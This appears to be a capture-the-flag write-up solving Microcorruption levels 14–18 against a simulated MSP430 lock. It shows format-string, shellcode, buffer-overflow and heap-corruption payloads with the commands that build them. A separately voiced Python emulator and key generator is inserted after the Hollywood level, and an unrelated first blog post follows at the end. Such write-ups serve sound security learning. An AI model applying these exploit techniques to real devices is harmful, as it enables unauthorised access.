low-power device which allows the LockIT  Pro to run in almost any
environment.

The  LockIT  Pro   contains  a  Bluetooth  chip   allowing  it  to
communicate with the  LockIT Pro App, allowing the  LockIT Pro to
be inaccessible from the exterior of the building.

There  is no  default  password  on the  LockIT  Pro HSM-2.   Upon
receiving the  LockIT Pro,  a new  password must  be set  by first
connecting the LockitPRO HSM to  output port two, connecting it to
the LockIT Pro App, and entering a new password when prompted, and
then restarting the LockIT Pro using the red button on the back.

LockIT Pro Hardware  Security Module 2 stores  the login password,
ensuring users  can not access  the password through  other means.
The LockIT Pro  can send the LockIT Pro HSM-2  a password, and the
HSM will  directly send the  correct unlock message to  the LockIT
Pro Deadbolt  if the password  is correct, otherwise no  action is
taken.

Despite the  year of development  effort which  went in to  it, we
have heard  reports that  the memory  protection introduced  in to
LockIT Pro r e.01 is insufficient. We have removed this feature in
favor of  the tried-and-true HSM-2. The  engineers responsible for
LockIT Pro r e.01 have been sacked.

This is Hardware  Version C.  It contains  the Bluetooth connector
built in, and two available  ports: the LockIT Pro Deadbolt should
be  connected to  port  1,  and the  LockIT  Pro  HSM-2 should  be
connected to port 2.

This is  Software Revision 05.  We have implemented  new state-of-
the-art techniques to prevent any further lock issues.

Solution:
Break main and type “c”:

screenshot

screenshot 2

We see that ASLR is implemented.
Address Space Layout Randomization is a protection mechanism that guards against buffer overflow exploitation by randomizing the locations at which executables are loaded in memory. This means the addresses we need to overwrite will vary from run to run.

We can also see printf at 0x476a, which might mean a format string vulnerability.
Also notice the INT at 0x48ec.

Calculations for exploit development:
0x48ec – 0x476a = 0x182

Testing the format string theory:
c
Input: %x%x
c
c

screenshot 3
screenshot 4

The program is vulnerable to format string attacks.
Also notice how everything was overwritten.

The address of printf is 0x6c56.

The password should be:
8 random bytes + (printf_addr + 0x182) + 2 random bytes + 7f00

Write a Python script to get us the password:

screenshot 5

Run the script and test the exploit:
python vladivostok.py

Password (Hex encoded input): 4141414141414141d86d42427f00
c

screenshot 6

We have our solution and can now pass the challenge.

Type “solve”.

screenshot 7

screenshot 8
screenshot 9

Password (Hex encoded input): 41414141414141411e7942427f00

screenshot 10

 

Level 15: Bangalore

OVERVIEW

– The lock uses the first MSP430 ever to have memory protection.
– This lock is attached to the LockIT Pro HSM-2.

DETAILS

The LockIT Pro c.01  is the first of a new series  of locks. It is
controlled by a  MSP430 microcontroller, and is  the most advanced
MCU-controlled lock available on the  market. The MSP430 is a very
low-power device which allows the LockIT  Pro to run in almost any
environment.

The  LockIT  Pro   contains  a  Bluetooth  chip   allowing  it  to
communicate with the  LockIT Pro App, allowing the  LockIT Pro to
be inaccessible from the exterior of the building.

There  is no  default  password  on the  LockIT  Pro HSM-2.   Upon
receiving the  LockIT Pro,  a new  password must  be set  by first
connecting the LockitPRO HSM to  output port two, connecting it to
the LockIT Pro App, and entering a new password when prompted, and
then restarting the LockIT Pro using the red button on the back.

LockIT Pro Hardware  Security Module 2 stores  the login password,
ensuring users  can not access  the password through  other means.
The LockIT Pro  can send the LockIT Pro HSM-2  a password, and the
HSM will  directly send the  correct unlock message to  the LockIT
Pro Deadbolt  if the password  is correct, otherwise no  action is
taken.

Lockitall engineers  have worked for  over a year to  bring memory
protection to  the MSP430—a  truly amazing achievement.  Each of
the 256  pages can  either be executable  or writeable,  but never
both, finally  bringing to  a close  some of  the issues  in prior
versions.

This  is Hardware  Version  C. It  contains  the all-new  modified
MSP430  with hardware  memory protection.   This hardware  version
also contains the Bluetooth connector  built in, and two available
ports: the LockIT Pro Deadbolt should  be connected to port 1, and
the LockIT Pro HSM-2 should be connected to port 2.

This is Software Revision 01. The new firmware supports the memory
protection we have introduced in this new hardware version.

Solution:
Break main and type “c”:

screenshot

Notice this program has Data Execution Prevention (DEP) enabled.
Both the manual and the program show that pages are either executable or writable.
0x1 makes the page writable and 0x0 makes the page executable.

Type “c” and use Python for input:
c
python -c "print '61' * 20"
Input (hex-encoded): 6161616161616161616161616161616161616161

screenshot 2

Notice our input starts at 0x3fee.

Reset.
reset
c
c
python -c "print '61' * 16 + 'ee3f'"
Input (hex-encoded): 61616161616161616161616161616161ee3f
c

screenshot 3

We get a segmentation fault, saying it cannot execute a write-only page.

We need to mark the page holding our input as executable, using mark_page_executable at 0x44ba.
The format we will use is:
<shellcode><buffer><mark_page_executable><page num><executable mark><input addr>

This will mark our input page as executable and then execute our shellcode.

Go to the Assembler.
Assemble:
mov       #0xff00, sr
call      #0x10

screenshot 4

Where 0xff00 is 0x8000 + 0x7f00

The assembled objects are: 324000ffb0121000

Use Python to calculate the password:
python -c "print '324000ffb0121000' + '61' * 8 + 'ba44' + '3f00' + '0000' + 'ee3f'"

Password (Hex encoded input): 324000ffb01210006161616161616161ba443f000000ee3f

Type “reset”, “solve”, and enter the password.

screenshot 5

 

Level 16: Lagos

OVERVIEW

– Passwords may now only contain alphanumeric characters.
– This lock is attached to the LockIT Pro HSM-2.

DETAILS

The LockIT Pro c.04  is the first of a new series  of locks. It is
controlled by a  MSP430 microcontroller, and is  the most advanced
MCU-controlled lock available on the  market. The MSP430 is a very
low-power device which allows the LockIT  Pro to run in almost any
environment.

The  LockIT  Pro   contains  a  Bluetooth  chip   allowing  it  to
communicate with the  LockIT Pro App, allowing the  LockIT Pro to
be inaccessible from the exterior of the building.

There  is no  default  password  on the  LockIT  Pro HSM-2.   Upon
receiving the  LockIT Pro,  a new  password must  be set  by first
connecting the LockitPRO HSM to  output port two, connecting it to
the LockIT Pro App, and entering a new password when prompted, and
then restarting the LockIT Pro using the red button on the back.

LockIT Pro Hardware  Security Module 2 stores  the login password,
ensuring users  can not access  the password through  other means.
The LockIT Pro  can send the LockIT Pro HSM-2  a password, and the
HSM will  directly send the  correct unlock message to  the LockIT
Pro Deadbolt  if the password  is correct, otherwise no  action is
taken.

This is Hardware  Version C.  It contains  the Bluetooth connector
built in, and two available  ports: the LockIT Pro Deadbolt should
be  connected to  port  1,  and the  LockIT  Pro  HSM-2 should  be
connected to port 2.

This is  Software Revision  04. Due to  user confusion  over which
characters passwords may contain,  only alphanumeric passwords are
accepted.

Solution:
Note that this level only accepts alphanumeric characters, so we can only use: 0x30-0x39, 0x41-0x5a and 0x61-0x7a

Break main and type “c” twice:
Input: 111122223333

screenshot

Notice we have a 200-byte space to play with, starting from 0x2400.

Type “c”:
c

screenshot 2

Notice our input starts at 0x43ed, and the return address is at 0x43fe.

0x43fe - 0x43ed = 17

Our buffer will consist of 17 characters.

We want to call INT 0x7f in order to unlock the door.

screenshot 3

Notice that 0x4654 in getsn lies within our limited character range and lets us enter further input that is unconstrained.
We will return to 0x4654 and specify the address to write to, the input size and the return address.

Use Python to make the calculations:
python -c "print '41' * 17 + '5446' + '3044' * 3"

Reset.
c
c
Input (hex-encoded): 41414141414141414141414141414141415446304430443044
c
Wait

Go to the Assembler.
Assemble:
push #0x7f
call  #0x45fc

screenshot 4

Assembled objects: 30127f00b012fc45

These assembled objects are how we issue the INT to bypass authentication.

Remember:

screenshot 6

Back in the input prompt:
c
Input (hex-encoded): 30127f00b012fc45
c

screenshot 5

We have our solution and can now pass the challenge.

Password (Hex encoded input): 41414141414141414141414141414141415446304430443044
Password (Hex encoded input): 30127f00b012fc45

Type “reset”, “solve”, and enter the password.

screenshot 7

 

Level 17: Chernobyl

OVERVIEW

– This lock contains the all-new LockIT Pro Account Manager.

DETAILS

The LockIT Pro d.02  is the first of a new series  of locks. It is
controlled by a  MSP430 microcontroller, and is  the most advanced
MCU-controlled lock available on the  market. The MSP430 is a very
low-power device which allows the LockIT  Pro to run in almost any
environment.

The  LockIT  Pro   contains  a  Bluetooth  chip   allowing  it  to
communicate with the  LockIT Pro App, allowing the  LockIT Pro to
be inaccessible from the exterior of the building.

LockIT Pro Account Manager solves the problem of sharing passwords
when  multiple users  must  have  access to  a  lock. The  Account
Manager contains  a mapping of users  to PINs, each of  which is 4
digits.  The  system supports  hundreds of users,  each configured
with his or her own PIN,  without degrading the performance of the
manager.

There are no accounts set up  on the LockIT Pro Account Manager by
default. An administrator must first initialize the lock with user
accounts  and  their  PINs.  User  accounts  are  by  default  not
authorized  for access,  but can  be authorized  by attaching  the
Account  Manager  Authorizer.  This  prevents  users  from  adding
themselves to the lock during its use.

This is Hardware  Version D.  It contains  the Bluetooth connector
built in, and one available port, to which the LockIT Pro Deadbolt
should be connected. When authorizing PINs, the Deadbolt should be
disconnected and the Authorizer should be attached in its place.

This   is  Software   Revision   02.  It   contains  the   all-new
vault-manager software.

Solution:
Break main and type “c” twice:

Input: aaaa bbbb
c
Input: aaaa bbb

Step through the program:
s …
s …
s …
s …

screenshot

Notice the stack pointer is just at the start of our name.

Continue stepping through the program.
s …
s …
s …
s …

screenshot 2
screenshot 3

Notice:
0x4ce6:  jnz    #0x4bbe <run+0x58>
0x4bbe is cmp.b    #0x61, r15
0x61 = a

Continue stepping through the program.
s …
s …

screenshot 4
screenshot 5

Notice:
0x4bc2:  jne    #0x4c38 <run+0xd2>
0x4c38 is    cmp.b    #0x6e, r15
0x6e = n

Continue stepping through the program.
s …
s …
s …
s …
s …

screenshot 6

Notice:
4bdc:    mov.b    @r11, r15

s …

screenshot 7

Notice r15 now holds our first b

Continue stepping through the program.
s

screenshot 8

The process repeats itself with the pin.

Pay attention to 49cc <get_from_table>. We will be stepping through and examining it.

Break at 49cc and step through it.
break 49cc
c
s …
s …
s …
s …
s …
s …
s …
s …
s …
s …

screenshot 9

s …

screenshot 10

The hash function gets called.

Notice also that further down, rehash calls both malloc and free.

As in the Algiers level, the key is to manipulate header metadata.
We need to set the backwards pointer (bk) as the destination address, and forward pointer (fd) as the return address.

Note that we can actually chain entries in the program by using “;”, similar to how we would perform command injections in other programs.

There is space for five entries per chain, and the sixth entry will overwrite.
Also important to note is that the new memory chunks are stored right after the last allocated chunk.

Craft a Python script to solve the challenge.

screenshot 11
screenshot 12
screenshot 13

python chernobyl.py

Password (Hex encoded input): 6e6577203020313b6e6577203820313b6e6577204820313b6e6577205020313b6e657720ca3d0101feff3420313b6e657720ca3da250b9f48a505c51feff3020313b6e6577205820313b6e6577206820313b6e6577207020313b6e6577207820313b6e657720303020313b6e657720303820313b324000ff30401000

Type “reset”, “solve”, and enter the password.

screenshot 14

 

Level 18: Hollywood

OVERVIEW

– New randomization improves code security.
– This lock is not attached to any hardware security module.

DETAILS

The LockIT Pro a.04 is the first of a new series of locks. It is
controlled by a MSP430 microcontroller, and is the most advanced
MCU-controlled lock available on the market. The MSP430 is a very
low-power device which allows the LockIT Pro to run in almost any
environment.

The LockIT Pro contains a Bluetooth chip allowing it to
communicate with the LockIT Pro App, allowing the LockIT Pro to
be inaccessible from the exterior of the building.

There is no default password on the LockIT Pro—upon receiving
the LockIT Pro, a new password must be set by connecting it to the
LockIT Pro App and entering a password when prompted, and then
restarting the LockIT Pro using the red button on the back.

This is Hardware Version A. It contains the Bluetooth connector
built in, and one available port to which the LockIT Pro Deadbolt
should be connected.

This is Software Revision 04. Our developers have included a new
hardware random number generator, making it impossible to know
where the password will be. We apologize again for making it too
easy for the password to be recovered. Those responsible for
sacking the engineers who were previously sacked have been sacked.

Solution:

Everything is randomized, so we have to step through all of the program.

We get the following algorithm that deals with user input:

mov #0x2600, r5
clr r6
add @r5, r4
swpb r4
xor @r5+, r6
xor r4, r6
xor r6, r4
tst 0x0(r5)
mov sr, r7
and #0x2, r7
rra r7
xor #0x1, r7
swpb r7
rra r7
sxt r7
swpb r7
sxt r7
mov #0x4b18, r8
and r7, r8
and #0x47aa, r7
add r7, r8
clr r7
mov r8, r12
cmp #0xfeb1, r4
mov sr, r7
clr r4
cmp #0x9298, r6
and sr, r7
clr r6
rra r7
xor #0x1, r7
swpb r7
rra r7
rra r7
rra r7
rra r7
bis r7, sr
mov #0xff00, sr
call #0x10

We craft a script to generate the key:

screenshot

Run the script:
ruby hollywood.rb

Password (Hex encoded input): 1220833eef6b

Type “reset”, “solve”, and enter the password.

screenshot 2
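An added Python emulator of the loop transcribed above together with a small key generator; it is not the author's hollywood.rb. It assumes r4 is zero when the loop is entered (the listing only clears r6), that the words are read little-endian from the input buffer r5 points at, and that the lock opens when both compares (0xfeb1 against r4, 0x9298 against r6) succeed.

```python
import struct

TARGET = (0xfeb1, 0x9298)   # the two cmp constants tested once the loop has finished

def swpb(x):
    """MSP430 SWPB: exchange the two bytes of a 16-bit word."""
    return ((x & 0xff) << 8) | (x >> 8)

def step(r4, r6, w):
    """One pass of the loop body for the input word w; all arithmetic is 16-bit."""
    r4 = swpb((r4 + w) & 0xffff)   # add @r5, r4 ; swpb r4
    r6 ^= w                        # xor @r5+, r6
    r6 ^= r4                       # xor r4, r6
    r4 ^= r6                       # xor r6, r4
    return r4, r6

def words(buf):
    """Little-endian 16-bit words of the input buffer, zero-padded to an even length."""
    buf = bytes(buf) + b"\x00" * (len(buf) % 2)
    return list(struct.unpack("<%dH" % (len(buf) // 2), buf))

def emulate(buf):
    """(r4, r6) after the loop. The first word is always processed; from then on
    'tst 0x0(r5)' ends the loop as soon as the next word is zero. Assumes r4 = 0 on entry."""
    r4 = r6 = 0
    for i, w in enumerate(words(buf) or [0]):
        if i and w == 0:
            break
        r4, r6 = step(r4, r6, w)
    return r4, r6

def unlocks(buf):
    """True when both compares (cmp #0xfeb1, r4 and cmp #0x9298, r6) would succeed."""
    return emulate(buf) == TARGET

def solve(max_w1=0x100):
    """Generate a three-word key. Every pass leaves r4 equal to (previous r6 ^ word), so once
    w1 and w2 are chosen the third word is forced by the r4 target; w2 is then searched
    until the r6 target holds as well. Zero words are skipped: they would end the loop early."""
    for w1 in range(1, max_w1):
        a4, a6 = step(0, 0, w1)
        for w2 in range(1, 0x10000):
            b4, b6 = step(a4, a6, w2)
            w3 = b6 ^ TARGET[0]
            if w3 and step(b4, b6, w3) == TARGET:
                return struct.pack("<3H", w1, w2, w3)
    return None
```

solve().hex() is the value to enter as hex-encoded input; unlocks() lets you check any candidate against the transcribed loop before trying it in the debugger.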

 

— Microcorruption Finished — 

 

Notes on the CTF: Very fun and educational challenges. The user interface looked great and with the inclusion of the assembler and the manual, you had all you needed to complete the challenges.

First blog post

About this blog – CTF and war game write-ups, exploits, code, and news.

This blog will consist of a series of write-ups of war games and capture the flag competitions I compete in and complete. I will also be posting about some of my exploits, what I’m working on with regards to cyber security, as well as important news.

My main interest is in embedded security. However, I compete and am interested in all aspects of network security. So, expect posts covering the whole cyber security gamut.

In the coming weeks I will be posting some of my complete write-ups, as well as work in progress.

Some of the war games I have completed include:

  1. Bandit
  2. Natas
  3. Narnia
  4. Behemoth

  1. Basic
  2. Realistic
  3. Cryptography
  4. Programming
  5. Steganography

  1. Basic
  2. Realistic
  3. Programming
  4. Javascript
  5. Forensic

 

I am currently working on:

 

I will be participating with my CTF team in EkoParty 2016 and a few other CTF competitions later this year. So expect write-ups on these as well.